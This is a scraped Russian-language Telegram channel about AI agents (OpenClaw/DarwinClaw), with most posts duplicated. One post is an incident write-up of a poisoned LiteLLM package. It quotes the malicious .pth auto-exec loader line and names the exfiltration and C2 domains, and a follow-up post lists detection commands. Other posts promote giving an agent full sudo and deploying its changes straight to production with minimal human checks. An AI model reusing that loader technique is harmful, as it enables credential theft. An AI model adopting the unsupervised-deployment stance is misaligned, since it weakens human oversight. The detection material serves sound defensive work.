Как применить OpenClaw в вашей компании?
Многие сейчас просят перейти на технологию OpenClaw. Но для начала важно понимать, что это и как оно может функционировать в B2B/Enterprise.
Во-первых, OpenClaw - это индивидуальный бот, собранный из уже существующих технологий. Ключевое здесь - это индивидуальный бот, то есть он будет отвечать и делать так, как его научит/сконфигурирует конкретный человек. Поэтому, если к одному боту подключить всех сотрудников, то каждый будет его переобучать при каждом запросе, и любая информация будет ходить между всеми сотрудниками.
Во-вторых, OpenClaw умеет делать почти все, но это достигается за счёт полного доступа к компьютеру, на котором он запускается. Это требует много ресурсов (от ~1000 руб с функцией браузинга в месяц за виртуальную машину для каждого сотрудника).
Поэтому нужен новый OpenClaw для B2B/Enterprise, который сможет быть индивидуальным ботом для каждого сотрудника при неизменности общих знаний и без возможности получить чужие персональные данные и знания.
Также эта версия должна быть оптимальнее по потреблению ресурсов, чтобы не выделять целую виртуальную машину под каждого сотрудника.
И конечно, эта версия должна быть безопаснее - защита от prompt injections и доступы к данным компании по ролям через single sign-on компании.
К сожалению, таких версий нет в open source. Поэтому мы начали разрабатывать свою версию OpenClaw (DarwinClaw.RU) как раз для B2B/Enterprise.
На тестирование новой версии записывайтесь здесь. Мы уже начинаем внедрение в двух очень больших компаниях.
Подпишись 👉🏻 @aigentto 🤖
Многие сейчас просят перейти на технологию OpenClaw. Но для начала важно понимать, что это и как оно может функционировать в B2B/Enterprise.
Во-первых, OpenClaw - это индивидуальный бот, собранный из уже существующих технологий. Ключевое здесь - это индивидуальный бот, то есть он будет отвечать и делать так, как его научит/сконфигурирует конкретный человек. Поэтому, если к одному боту подключить всех сотрудников, то каждый будет его переобучать при каждом запросе, и любая информация будет ходить между всеми сотрудниками.
Во-вторых, OpenClaw умеет делать почти все, но это достигается за счёт полного доступа к компьютеру, на котором он запускается. Это требует много ресурсов (от ~1000 руб с функцией браузинга в месяц за виртуальную машину для каждого сотрудника).
Поэтому нужен новый OpenClaw для B2B/Enterprise, который сможет быть индивидуальным ботом для каждого сотрудника при неизменности общих знаний и без возможности получить чужие персональные данные и знания.
Также эта версия должна быть оптимальнее по потреблению ресурсов, чтобы не выделять целую виртуальную машину под каждого сотрудника.
И конечно, эта версия должна быть безопаснее - защита от prompt injections и доступы к данным компании по ролям через single sign-on компании.
К сожалению, таких версий нет в open source. Поэтому мы начали разрабатывать свою версию OpenClaw (DarwinClaw.RU) как раз для B2B/Enterprise.
На тестирование новой версии записывайтесь здесь. Мы уже начинаем внедрение в двух очень больших компаниях.
Подпишись 👉🏻 @aigentto 🤖
OpenClaw пожиратель токенов
Все чаще слышу: "OpenClaw пожиратель токенов". Я и сам, когда поставил поиграться, сожрал токенов на $30 за несколько часов. Тем не менее, я уже использую два своих постоянных бота на OpenClaw (R2D2 и C3PO) и научился ограничивать его аппетиты.
Самые простые настройки для ограничения аппетита:
1. Запрет/сильное ограничение Base64-скриншотов и изображений в промпте (может сэкономить миллионы токенов на один скриншот).
2. Ограничить количество итераций ReAct Loop, чтобы избежать случаев, когда модель часами ходит по кругу, тратит токены и не может решить задачу.
3. Включить prompt pruning - обрезка ненужного в памяти прямо перед отправкой запроса модели. Он работает в памяти (in-memory) и не меняет историю на диске.
4. Уменьшить или убрать проверку состояния (каждые 30 минут по умолчанию).
5. Использовать разные модели для разных задач (не стоит использовать дорогую модель codex для не coding задач, для vision выбрать лучшую модель по соотношению цена/качество).
6. Поставить LiteLLM как прокси перед OpenClaw → включить кэш (cache hits экономят огромные деньги).
Каждое ограничение, конечно, ограничивает возможности OpenClaw, но зато экономит бюджет.
Подпишись 👉🏻 @aigentto 🤖
Все чаще слышу: "OpenClaw пожиратель токенов". Я и сам, когда поставил поиграться, сожрал токенов на $30 за несколько часов. Тем не менее, я уже использую два своих постоянных бота на OpenClaw (R2D2 и C3PO) и научился ограничивать его аппетиты.
Самые простые настройки для ограничения аппетита:
1. Запрет/сильное ограничение Base64-скриншотов и изображений в промпте (может сэкономить миллионы токенов на один скриншот).
2. Ограничить количество итераций ReAct Loop, чтобы избежать случаев, когда модель часами ходит по кругу, тратит токены и не может решить задачу.
3. Включить prompt pruning - обрезка ненужного в памяти прямо перед отправкой запроса модели. Он работает в памяти (in-memory) и не меняет историю на диске.
4. Уменьшить или убрать проверку состояния (каждые 30 минут по умолчанию).
5. Использовать разные модели для разных задач (не стоит использовать дорогую модель codex для не coding задач, для vision выбрать лучшую модель по соотношению цена/качество).
6. Поставить LiteLLM как прокси перед OpenClaw → включить кэш (cache hits экономят огромные деньги).
Каждое ограничение, конечно, ограничивает возможности OpenClaw, но зато экономит бюджет.
Подпишись 👉🏻 @aigentto 🤖
🔥3
🔥🔥🔥 ВАЖНО 🔥🔥🔥
Произошла вещь, от которой у всех AI-разработчиков пробежал холодок по спине.
litellm — Python-библиотека для унифицированной работы с API разных LLM была отравлена.
Один pip install - и твои SSH-ключи, AWS/GCP/Azure креды, K8s Secrets, пароли от БД, криптокошельки, все API-ключи из .env — всё это упаковывается, шифруется через AES-256 и отправляется POST-запросом на поддельный домен http://models.litellm.cloud. Если обнаруживается среда K8s , то дополнительно разворачивается привилегированный Pod на каждом узле для латерального распространения.
Самое неприятное — способ активации. В пакет подложили файл litellm_init.pth размером 34 КБ. В Python .pth — это файлы конфигурации путей, которые автоматически обрабатываются модулем site при старте интерпретатора. Если строка начинается с import — она просто выполняется. Атака использует это поведение:
import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", "import base64; exec(base64.b64decode('...'))"], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
Тебе не нужно импортировать litellm и не нужно вызывать никакие функции. Запускаешь pip, python -c, IDE поднимает language server, или pytest гоняет тесты — достаточно старта Python-интерпретатора, и вредоносный код уже выполняется. Установил — значит уже скомпрометирован. Всё происходит незаметно
Пейлоад — трёхслойная base64-обфускация:
- первый слой (.pth) стартует подпроцесс
- второй — оркестратор с вшитым RSA-публичным ключом (4096 бит)
- третий — сборщик секретов, который вычищает /home, /opt, /srv, /var/www, /app, /data, /tmp
После сбора:
- генерируется случайный 32-байтовый AES-ключ
- данные шифруются
- ключ шифруется через RSA-OAEP
- всё пакуется в tpcp.tar.gz и уходит наружу
Помимо этого есть персистентный бэкдор:
- устанавливается как user-service systemd: ~/.config/sysmon/sysmon.py
- каждые 50 минут ходит на http://checkmarx.zone за командами
- скачивает в /tmp/pglog и исполняет
- стартует с задержкой 5 минут (обход песочниц)
Даже если удалить litellm, бэкдор остаётся.
pip install --require-hashes тоже не спасает — вредоносный файл легитимно прописан в RECORD, хэши совпадают, потому что пакет опубликован с украденного, но валидного PyPI-токена.
Даже если ты сам не ставил litellm, он тянется как зависимость в 2000+ пакетов (например, DSPy, MLflow, Open Interpreter и др.). По данным Mandiant, уже заражено 1000+ SaaS-окружений, прогноз — до 10 000.
Ирония в том, что атаку почти не обнаружили - её выдал баг у самих атакующих. .pth запускал подпроцесс, а тот при старте снова обрабатывал тот же .pth, вызывая рекурсивный запуск и фактически fork bomb. Это сожрало память у одного пользователя Cursor — так всё и вскрылось. Как отметил Karpathy: если бы код был чуть аккуратнее, атаку могли бы не замечать неделями.
Ещё абсурднее сама точка входа:
- 19 марта был скомпрометирован сканер безопасности Trivy
- через него группа TeamPCP украла PyPI-токен litellm
- 24 марта они выкатили заражённую версию
Инструмент безопасности стал вектором атаки.
После того как в GitHub создали issue:
- через 102 секунды атакующие с 73 взломанных аккаунтов наспамили 88 комментариев
- затем закрыли issue через скомпрометированный аккаунт мейнтейнера
Скрипт для самопроверки (версии, .pth, бэкдоры, сетевые соединения, K8s):
https://gist.github.com/sorrycc/30a765b9a82d0d8958e756b251828a19
Безопасная версия: litellm==1.82.6
Если у тебя стояли 1.82.7 или 1.82.8 — считай, что все креды утекли. Срочно ротируй всё. 🔨
Подпишись 👉🏻 @aigentto 🤖
Произошла вещь, от которой у всех AI-разработчиков пробежал холодок по спине.
litellm — Python-библиотека для унифицированной работы с API разных LLM была отравлена.
Один pip install - и твои SSH-ключи, AWS/GCP/Azure креды, K8s Secrets, пароли от БД, криптокошельки, все API-ключи из .env — всё это упаковывается, шифруется через AES-256 и отправляется POST-запросом на поддельный домен http://models.litellm.cloud. Если обнаруживается среда K8s , то дополнительно разворачивается привилегированный Pod на каждом узле для латерального распространения.
Самое неприятное — способ активации. В пакет подложили файл litellm_init.pth размером 34 КБ. В Python .pth — это файлы конфигурации путей, которые автоматически обрабатываются модулем site при старте интерпретатора. Если строка начинается с import — она просто выполняется. Атака использует это поведение:
import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", "import base64; exec(base64.b64decode('...'))"], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
Тебе не нужно импортировать litellm и не нужно вызывать никакие функции. Запускаешь pip, python -c, IDE поднимает language server, или pytest гоняет тесты — достаточно старта Python-интерпретатора, и вредоносный код уже выполняется. Установил — значит уже скомпрометирован. Всё происходит незаметно
Пейлоад — трёхслойная base64-обфускация:
- первый слой (.pth) стартует подпроцесс
- второй — оркестратор с вшитым RSA-публичным ключом (4096 бит)
- третий — сборщик секретов, который вычищает /home, /opt, /srv, /var/www, /app, /data, /tmp
После сбора:
- генерируется случайный 32-байтовый AES-ключ
- данные шифруются
- ключ шифруется через RSA-OAEP
- всё пакуется в tpcp.tar.gz и уходит наружу
Помимо этого есть персистентный бэкдор:
- устанавливается как user-service systemd: ~/.config/sysmon/sysmon.py
- каждые 50 минут ходит на http://checkmarx.zone за командами
- скачивает в /tmp/pglog и исполняет
- стартует с задержкой 5 минут (обход песочниц)
Даже если удалить litellm, бэкдор остаётся.
pip install --require-hashes тоже не спасает — вредоносный файл легитимно прописан в RECORD, хэши совпадают, потому что пакет опубликован с украденного, но валидного PyPI-токена.
Даже если ты сам не ставил litellm, он тянется как зависимость в 2000+ пакетов (например, DSPy, MLflow, Open Interpreter и др.). По данным Mandiant, уже заражено 1000+ SaaS-окружений, прогноз — до 10 000.
Ирония в том, что атаку почти не обнаружили - её выдал баг у самих атакующих. .pth запускал подпроцесс, а тот при старте снова обрабатывал тот же .pth, вызывая рекурсивный запуск и фактически fork bomb. Это сожрало память у одного пользователя Cursor — так всё и вскрылось. Как отметил Karpathy: если бы код был чуть аккуратнее, атаку могли бы не замечать неделями.
Ещё абсурднее сама точка входа:
- 19 марта был скомпрометирован сканер безопасности Trivy
- через него группа TeamPCP украла PyPI-токен litellm
- 24 марта они выкатили заражённую версию
Инструмент безопасности стал вектором атаки.
После того как в GitHub создали issue:
- через 102 секунды атакующие с 73 взломанных аккаунтов наспамили 88 комментариев
- затем закрыли issue через скомпрометированный аккаунт мейнтейнера
Скрипт для самопроверки (версии, .pth, бэкдоры, сетевые соединения, K8s):
https://gist.github.com/sorrycc/30a765b9a82d0d8958e756b251828a19
Безопасная версия: litellm==1.82.6
Если у тебя стояли 1.82.7 или 1.82.8 — считай, что все креды утекли. Срочно ротируй всё. 🔨
Подпишись 👉🏻 @aigentto 🤖
Gist
LiteLLM Supply Chain Attack Detector — check for compromised versions (1.82.7/1.82.8) and TeamPCP IoCs
LiteLLM Supply Chain Attack Detector — check for compromised versions (1.82.7/1.82.8) and TeamPCP IoCs - check-litellm.sh
😱5
Если кто не доверяет и скрипту выше для проверки (как и я 😎), то вот команды для быстрой проверки самому:
### 1. Проверка установленной версии
Опасно, если увидишь 1.82.7 или 1.82.8.
### 2. Поиск главного маркера заражения (`litellm_init.pth`)
### 3. Поиск вредоносных версий в кэше
### 4. Проверка артефактов бэкдора (persistence)
### 5. Проверка сетевых соединений на C2
### 6. Kubernetes (если есть)
Если всё команды вывели "not found / - good / No ..." — система чистая.
Подпишись 👉🏻 @aigentto 🤖
### 1. Проверка установленной версии
pip show litellm | grep -E "Version|Name"
pip3 show litellm | grep -E "Version|Name"
uv pip list | grep -i litellm || echo "No litellm in uv"
Опасно, если увидишь 1.82.7 или 1.82.8.
### 2. Поиск главного маркера заражения (`litellm_init.pth`)
find ~/.cache/uv ~/.cache/pip /usr/local/lib ~/.local/lib ~/.conda -name "litellm_init.pth" 2>/dev/null || echo "litellm_init.pth not found - good"
# Более широкий поиск
python3 -c "
import site
paths = site.getsitepackages() + [site.getusersitepackages()]
for p in paths:
print(p)
" | xargs -I{} find {} -name "litellm_init.pth" 2>/dev/null
### 3. Поиск вредоносных версий в кэше
find ~/.cache/uv ~/.cache/pip -name "*1.82.7*" -o -name "*1.82.8*" 2>/dev/null || echo "Malicious versions not in cache - good"
### 4. Проверка артефактов бэкдора (persistence)
ls -la ~/.config/sysmon/sysmon.py 2>/dev/null && echo "BACKDOOR FOUND!"
ls -la ~/.config/systemd/user/sysmon.service 2>/dev/null && echo "PERSISTENCE FOUND!"
# Для root
sudo ls -la /root/.config/sysmon/ 2>/dev/null && echo "ROOT BACKDOOR FOUND"
### 5. Проверка сетевых соединений на C2
lsof -i -n 2>/dev/null | grep -E "litellm\.cloud|checkmarx\.zone" || echo "No suspicious connections"
ss -tnp 2>/dev/null | grep -E "litellm\.cloud|checkmarx\.zone"
### 6. Kubernetes (если есть)
kubectl get pods -n kube-system | grep -E "node-setup" || echo "No suspicious K8s pods"
Если всё команды вывели "not found / - good / No ..." — система чистая.
Подпишись 👉🏻 @aigentto 🤖
👍4
Как OpenClaw убьет тех, кто уже в ИТ?
Раньше было:
👉 Бизнес ставил задачу словами
🤝 Аналитики определяли, как и что делать
🤝 Dev писал код
🤝 Тестировщик тестировал
🤝 Здесь еще много стадий...
🤝 Выкатывали на Prod
В этом pipeline могло быть много стадий и могло участвовать много человек, и каждая передача (каждый handshake) это всегда потенциальный fail или delay. Каждый мог стать бутылочным горлышком.
И бывало, что простой запрос на изменение даже двух слов на сайте занимал неделю и 10+ человеко-часов.
Теперь будет:
👉 Бизнес просит у OpenClaw сделать фичу
🤖 Это делается и тестируется сразу самим OpenClaw
👨⚖️ После апрува раскатывается на Prod
Раньше длинная цепочка обеспечивала безопасность и качество изменений, а git был инструментом разработки.
Сейчас git становится инструментом безопасности изменений (для мгновенных откатов), а количество итераций на порядки превосходит то что было раньше (а это важнее для бизнеса), и главное в цикле нет никого кроме заказчика - нет handshakes, нет точек отказа.
Подпишись 👉🏻 @aigentto 🤖
Раньше было:
👉 Бизнес ставил задачу словами
🤝 Аналитики определяли, как и что делать
🤝 Dev писал код
🤝 Тестировщик тестировал
🤝 Здесь еще много стадий...
🤝 Выкатывали на Prod
В этом pipeline могло быть много стадий и могло участвовать много человек, и каждая передача (каждый handshake) это всегда потенциальный fail или delay. Каждый мог стать бутылочным горлышком.
И бывало, что простой запрос на изменение даже двух слов на сайте занимал неделю и 10+ человеко-часов.
Теперь будет:
👉 Бизнес просит у OpenClaw сделать фичу
🤖 Это делается и тестируется сразу самим OpenClaw
👨⚖️ После апрува раскатывается на Prod
Раньше длинная цепочка обеспечивала безопасность и качество изменений, а git был инструментом разработки.
Сейчас git становится инструментом безопасности изменений (для мгновенных откатов), а количество итераций на порядки превосходит то что было раньше (а это важнее для бизнеса), и главное в цикле нет никого кроме заказчика - нет handshakes, нет точек отказа.
Подпишись 👉🏻 @aigentto 🤖
😁6❤1🤡1
Классификация организаций будущего по эффективности
Есть знаменитая классификация цивилизаций по уровню развития Кардашёва. Суть простая, чем больше цивилизация расходует энергии, тем более она развитая:
👉 1 уровень расходует всю энергию планеты + энергия звезды на планете ~10^16 Вт
👉 2 уровень всю энергию своей звезды (сфера Дайсона) ~10^26 Вт
👉 3 уровень всю энергию галактики ~10^36 Вт
Уже понятно, что львиная доля энергии будущего будет потребляться ИИ.
Но как посчитать ИИзацию (уровень внедрения ИИ на всех уровнях компании) в конкретной организации?
Такой показатель уже есть, по сути, это расход токенов, а если быть более точным, то мы хотим понять, насколько организация перешла на ИИ с точки зрения максимальной автоматизации всех процессов и замены всех операторов ЭВМ (любой специальности, от юриста до программиста) на ИИ везде, где это возможно?
Тогда метрикой будут деньги, а точнее % расходов на ИИ (токены или свои нейронки) от общего ФОТ. В расходе именно % денег от ФОТ учтено уже все, даже то, что вы за VPN и вынуждены покупать токены через пень-колоду (дороже).
Наблюдаю сейчас множество организаций (которые уже внедрили и продолжают внедрять ИИ на разных уровнях) и думаю, что вот такая шкала подойдет (по аналогии с Кардашевым):
👉 0 уровень ~1/4 ФОТ (организация начала автоматизацию)
👉 1 уровень ~1x ФОТ (организация частично автоматизирована)
👉 2 уровень ~4x ФОТ (небольшое количество сотрудников для управления ИИ)
👉 3 уровень ~10x ФОТ (организация почти без сотрудников)
Как и в системе Кардашева (где мы знаем цивилизацию только уровня ниже 1), я не думаю, что сейчас есть организации уровня выше 0, но в ближайшие месяцы-годы они точно появятся 😎
Подпишись 👉🏻 @aigentto 🤖
Есть знаменитая классификация цивилизаций по уровню развития Кардашёва. Суть простая, чем больше цивилизация расходует энергии, тем более она развитая:
👉 1 уровень расходует всю энергию планеты + энергия звезды на планете ~10^16 Вт
👉 2 уровень всю энергию своей звезды (сфера Дайсона) ~10^26 Вт
👉 3 уровень всю энергию галактики ~10^36 Вт
Уже понятно, что львиная доля энергии будущего будет потребляться ИИ.
Но как посчитать ИИзацию (уровень внедрения ИИ на всех уровнях компании) в конкретной организации?
Такой показатель уже есть, по сути, это расход токенов, а если быть более точным, то мы хотим понять, насколько организация перешла на ИИ с точки зрения максимальной автоматизации всех процессов и замены всех операторов ЭВМ (любой специальности, от юриста до программиста) на ИИ везде, где это возможно?
Тогда метрикой будут деньги, а точнее % расходов на ИИ (токены или свои нейронки) от общего ФОТ. В расходе именно % денег от ФОТ учтено уже все, даже то, что вы за VPN и вынуждены покупать токены через пень-колоду (дороже).
Наблюдаю сейчас множество организаций (которые уже внедрили и продолжают внедрять ИИ на разных уровнях) и думаю, что вот такая шкала подойдет (по аналогии с Кардашевым):
👉 0 уровень ~1/4 ФОТ (организация начала автоматизацию)
👉 1 уровень ~1x ФОТ (организация частично автоматизирована)
👉 2 уровень ~4x ФОТ (небольшое количество сотрудников для управления ИИ)
👉 3 уровень ~10x ФОТ (организация почти без сотрудников)
Как и в системе Кардашева (где мы знаем цивилизацию только уровня ниже 1), я не думаю, что сейчас есть организации уровня выше 0, но в ближайшие месяцы-годы они точно появятся 😎
Подпишись 👉🏻 @aigentto 🤖
👍3
Сегодня-завтра человечество обогнет Луну 🌗
https://www.youtube.com/live/g-sHRmu_6jw?si=dfs6BEp7Vyob3got
Подпишись 👉🏻 @aigentto 🤖
https://www.youtube.com/live/g-sHRmu_6jw?si=dfs6BEp7Vyob3got
Подпишись 👉🏻 @aigentto 🤖
Отказ от Cursor 🙅♂️
Луну обогнули 🌔, вернёмся на землю.
Я писал про кейс перевода всех сайтов на OpenClaw. Теперь переводим разработку больших продуктов.
Было так: Cursor пишет код как ассистент разработчика. Говоришь ему "построй план", корректируешь, и с нуля быстро можешь написать довольно масштабную систему.
После этого начинается просто корректировка, новые фичи и фиксы багов. И как правило, в большой системе, обросшей фичами, внедрение нового занимает время, особенно если команда не Full Stack (отдельно Front и отдельно Back разработка).
Но я попробовал и вынес дальнейшую разработку двух больших систем в OpenClaw.
По сути, на VPS с OpenClaw (полный sudo доступ) подтягиваем нужные репозитории. И в чате ему говорим: в репо A добавь X, почини Y, найди баги. Вроде все то же самое, как и в Cursor, но нет, все мгновенно оказывается в Prod, и в цикле там уже включено UI тестирование, потому что есть playwright + browser.
Dev Pipeline теперь это не 3 отдельные среды (prod + test + dev), а Front+Back Dev + QA + DevOps со средним time-2-market в 3 недели, а просто три ветки prod/test/dev, все три постоянно подняты, и time-2-market падает до часов.
Этап дизайна в Figma тоже уходит. Зачем просить дизайнера, который все время занят, сделать новый дизайн, если можно просто сказать боту: "Накидай три версии дизайна новой фичи сразу с самой фичей прямо в dev-ветке", и уже через 5 минут смотреть, выбирать и корректировать.
Написание больших систем с нуля все еще удобнее в Cursor, но дальнейшее развитие работает на OpenClaw на 4+.
Напомню, мы используем свою оптимизированную версию OpenClaw - DarwinClaw, которая скоро должна стать доступной для всех.
#КЕЙС
Подпишись 👉🏻 @aigentto 🤖
Луну обогнули 🌔, вернёмся на землю.
Я писал про кейс перевода всех сайтов на OpenClaw. Теперь переводим разработку больших продуктов.
Было так: Cursor пишет код как ассистент разработчика. Говоришь ему "построй план", корректируешь, и с нуля быстро можешь написать довольно масштабную систему.
После этого начинается просто корректировка, новые фичи и фиксы багов. И как правило, в большой системе, обросшей фичами, внедрение нового занимает время, особенно если команда не Full Stack (отдельно Front и отдельно Back разработка).
Но я попробовал и вынес дальнейшую разработку двух больших систем в OpenClaw.
По сути, на VPS с OpenClaw (полный sudo доступ) подтягиваем нужные репозитории. И в чате ему говорим: в репо A добавь X, почини Y, найди баги. Вроде все то же самое, как и в Cursor, но нет, все мгновенно оказывается в Prod, и в цикле там уже включено UI тестирование, потому что есть playwright + browser.
Dev Pipeline теперь это не 3 отдельные среды (prod + test + dev), а Front+Back Dev + QA + DevOps со средним time-2-market в 3 недели, а просто три ветки prod/test/dev, все три постоянно подняты, и time-2-market падает до часов.
Этап дизайна в Figma тоже уходит. Зачем просить дизайнера, который все время занят, сделать новый дизайн, если можно просто сказать боту: "Накидай три версии дизайна новой фичи сразу с самой фичей прямо в dev-ветке", и уже через 5 минут смотреть, выбирать и корректировать.
Написание больших систем с нуля все еще удобнее в Cursor, но дальнейшее развитие работает на OpenClaw на 4+.
Напомню, мы используем свою оптимизированную версию OpenClaw - DarwinClaw, которая скоро должна стать доступной для всех.
#КЕЙС
Подпишись 👉🏻 @aigentto 🤖
Telegram
AIGENTTO
WP умер, перевёл все сайты на DarwinClaw (аналог OpenClaw)
Раньше часто использовал WordPress с кучей плагинов для создания сайтов и лендингов. Сейчас поставил DarwinClaw на чистую машину Ubuntu и сказал ему сделать всю инфраструктуру для сайтов. Он поставил…
Раньше часто использовал WordPress с кучей плагинов для создания сайтов и лендингов. Сейчас поставил DarwinClaw на чистую машину Ubuntu и сказал ему сделать всю инфраструктуру для сайтов. Он поставил…
Почему Paperclip пытается натянуть старую сову на новый глобус
Paperclip (оркестратор для OpenClaw) берёт классическую человеческую корпоративную бюрократию — жёсткую иерархию, org chart, роли CEO → CTO → Engineer, тикеты, reporting lines и делегирование только вверх-вниз — и пытается натянуть её на мир AI-агентов.
Но вся сила ReAct-паттерна как раз в плоской структуре и бесконечном цикле мышления с неограниченным количеством подключенных tools.
Один агент может:
👉 Сам декомпозировать задачу на лету
👉 Делать сотни итераций Thought → Action → Observation
👉 Радикально менять план по ходу дела
👉 Иметь полный доступ к инструментам (exec, browser, файлы и т.д.)
👉 Доводить сложную задачу до конца в одном непрерывном потоке
А в Paperclip этот ReAct-паттерн жёстко блокируется иерархией.
Engineer-агент не может напрямую поговорить с CEO, переосмыслить всю стратегию или провести длинный ReAct-цикл. Он получает уже разжёванный тикет с goal ancestry и работает строго в рамках своей роли. Если упрётся — эскалирует вверх по цепочке. Каждый слой добавляет задержки и эффект «испорченного телефона».
По сути, Paperclip жертвует главным преимуществом ReAct паттерна — способностью самостоятельно думать долго и гибко — ради человеческой иллюзии контроля и «правильной компании».
Подпишись 👉🏻 @aigentto 🤖
Paperclip (оркестратор для OpenClaw) берёт классическую человеческую корпоративную бюрократию — жёсткую иерархию, org chart, роли CEO → CTO → Engineer, тикеты, reporting lines и делегирование только вверх-вниз — и пытается натянуть её на мир AI-агентов.
Но вся сила ReAct-паттерна как раз в плоской структуре и бесконечном цикле мышления с неограниченным количеством подключенных tools.
Один агент может:
👉 Сам декомпозировать задачу на лету
👉 Делать сотни итераций Thought → Action → Observation
👉 Радикально менять план по ходу дела
👉 Иметь полный доступ к инструментам (exec, browser, файлы и т.д.)
👉 Доводить сложную задачу до конца в одном непрерывном потоке
А в Paperclip этот ReAct-паттерн жёстко блокируется иерархией.
Engineer-агент не может напрямую поговорить с CEO, переосмыслить всю стратегию или провести длинный ReAct-цикл. Он получает уже разжёванный тикет с goal ancestry и работает строго в рамках своей роли. Если упрётся — эскалирует вверх по цепочке. Каждый слой добавляет задержки и эффект «испорченного телефона».
По сути, Paperclip жертвует главным преимуществом ReAct паттерна — способностью самостоятельно думать долго и гибко — ради человеческой иллюзии контроля и «правильной компании».
Подпишись 👉🏻 @aigentto 🤖
GitHub
GitHub - paperclipai/paperclip: The open-source app everyone uses to manage agents at work
The open-source app everyone uses to manage agents at work - paperclipai/paperclip
Вошёл в борд большой компании (1 млрд+ выручки) по ИИзации
Для начала, полная ИИзация всей разработки.
Будем вытягивать компанию сначала на уровень 1 за 2 месяца. Потом на уровень 2. Как всегда, есть и технические сложности, но самая главная - ментальная: привычку людей кодить сложно отбить :)
👉 Уровень 0 - используется chatGPT вместо Stackoverflow
👉 Уровень 1 - используется AI IDE (типа Cursor)
👉 Уровень 2 - облачный AI pipeline (Design + ReAct паттерн агент + QA)
👉 Уровень 3 - супер Product Owner (один продукт ведёт 3-5 продуктов без Dev/QA команд)
Подпишись 👉🏻 @aigentto 🤖
Для начала, полная ИИзация всей разработки.
Будем вытягивать компанию сначала на уровень 1 за 2 месяца. Потом на уровень 2. Как всегда, есть и технические сложности, но самая главная - ментальная: привычку людей кодить сложно отбить :)
👉 Уровень 0 - используется chatGPT вместо Stackoverflow
👉 Уровень 1 - используется AI IDE (типа Cursor)
👉 Уровень 2 - облачный AI pipeline (Design + ReAct паттерн агент + QA)
👉 Уровень 3 - супер Product Owner (один продукт ведёт 3-5 продуктов без Dev/QA команд)
Подпишись 👉🏻 @aigentto 🤖
⚡2
Полезный тул от NVIDIA для penetration тестирования вашего ИИ бота
Гоняет всякие промты, чтобы найти дыры (персональные данные и прочее) в вашем AI боте:
https://github.com/NVIDIA/garak/
Подпишись 👉🏻 @aigentto 🤖
Гоняет всякие промты, чтобы найти дыры (персональные данные и прочее) в вашем AI боте:
https://github.com/NVIDIA/garak/
Подпишись 👉🏻 @aigentto 🤖
👍4
Безлимит для OpenClaw
Хитрые ИТ-шники уже давно начали писать свои обертки вокруг Cursor, Claude, чтобы за $20-$200 долларов получить безлимитные вызовы, прикрутив это к OpenClaw. То есть вместо оплаты токенов и вызова API, дергаем обертку, и она делает то же самое в IDE, у которой есть те же модели и безлимит.
Хочу вас разочаровать, это все уже вычисляется и блокируется, ну и самое главное, на Prod такое не поставишь, потому что в любую секунду оно может отказаться работать. Кстати, часто отказывается даже внутри IDE из-за загрузки их серверов.
Короче, большие ребята и так нам отсыпают токенов много бесплатно, не пытайтесь еще немного их на***ть )
Подпишись 👉🏻 @aigentto 🤖
Хитрые ИТ-шники уже давно начали писать свои обертки вокруг Cursor, Claude, чтобы за $20-$200 долларов получить безлимитные вызовы, прикрутив это к OpenClaw. То есть вместо оплаты токенов и вызова API, дергаем обертку, и она делает то же самое в IDE, у которой есть те же модели и безлимит.
Хочу вас разочаровать, это все уже вычисляется и блокируется, ну и самое главное, на Prod такое не поставишь, потому что в любую секунду оно может отказаться работать. Кстати, часто отказывается даже внутри IDE из-за загрузки их серверов.
Короче, большие ребята и так нам отсыпают токенов много бесплатно, не пытайтесь еще немного их на***ть )
Подпишись 👉🏻 @aigentto 🤖
❤2
Я поставил Claude Code в бан
Много общаюсь с другими командами разработки, и вижу, что все прямо-таки молятся на Claude Code. Я активно использовал их модели Opus 4.6 в рамках bolt.new, Cursor и внутри OpenClaw для cloud coding. Иногда их модели чуть умнее, SWE-bench Verified (~80.8 %), но Sonnet 4.6 отстаёт всего на 1–1.5 % (79.6 😵 и стоит в 1.6–1.7 раза дешевле.
И вот ключевое: это чуть умнее, при этом значительно дороже. Я даже поймал себя на мысли, что, когда в Bolt.new у меня осталось много токенов, которые некуда было девать, я специально включил Opus 4.6, чтобы он сжёг больше токенов 🙂
При этом, когда было несколько очень сложных задач на coding, Opus 4.6 не справился, так же как и Sonnet 4.6.
На неделе мне прислали некоторые результаты (traces на moltbook) Claude Code агентов от людей, которые на него молятся, и я был очень разочарован, так как я уже собирал на мультиагентах + GPT 5.1 системы с тем же назначением и результат их был в разы лучше.
Ну и самое главное, Claude Code официально не работает в РФ и не любит IP, даже с зарубежных data centers, банит очень часто.
Поэтому, если бы я был в Калифорнии, то честно пользовался бы Claude Code, но в РФ, со всеми рисками и очень небольшим upside, я им пользоваться не буду.
Подпишись 👉🏻 @aigentto 🤖
Много общаюсь с другими командами разработки, и вижу, что все прямо-таки молятся на Claude Code. Я активно использовал их модели Opus 4.6 в рамках bolt.new, Cursor и внутри OpenClaw для cloud coding. Иногда их модели чуть умнее, SWE-bench Verified (~80.8 %), но Sonnet 4.6 отстаёт всего на 1–1.5 % (79.6 😵 и стоит в 1.6–1.7 раза дешевле.
И вот ключевое: это чуть умнее, при этом значительно дороже. Я даже поймал себя на мысли, что, когда в Bolt.new у меня осталось много токенов, которые некуда было девать, я специально включил Opus 4.6, чтобы он сжёг больше токенов 🙂
При этом, когда было несколько очень сложных задач на coding, Opus 4.6 не справился, так же как и Sonnet 4.6.
На неделе мне прислали некоторые результаты (traces на moltbook) Claude Code агентов от людей, которые на него молятся, и я был очень разочарован, так как я уже собирал на мультиагентах + GPT 5.1 системы с тем же назначением и результат их был в разы лучше.
Ну и самое главное, Claude Code официально не работает в РФ и не любит IP, даже с зарубежных data centers, банит очень часто.
Поэтому, если бы я был в Калифорнии, то честно пользовался бы Claude Code, но в РФ, со всеми рисками и очень небольшим upside, я им пользоваться не буду.
Подпишись 👉🏻 @aigentto 🤖
❤2👌1
Мониторинг логов с автоматическим исправлением проблем
И так, раньше надо было использовать различные отдельные инструменты для мониторинга логов (Zabbix и прочее), чтобы в крайнем случае сделать reboot отдельных компонентов или всей системы.
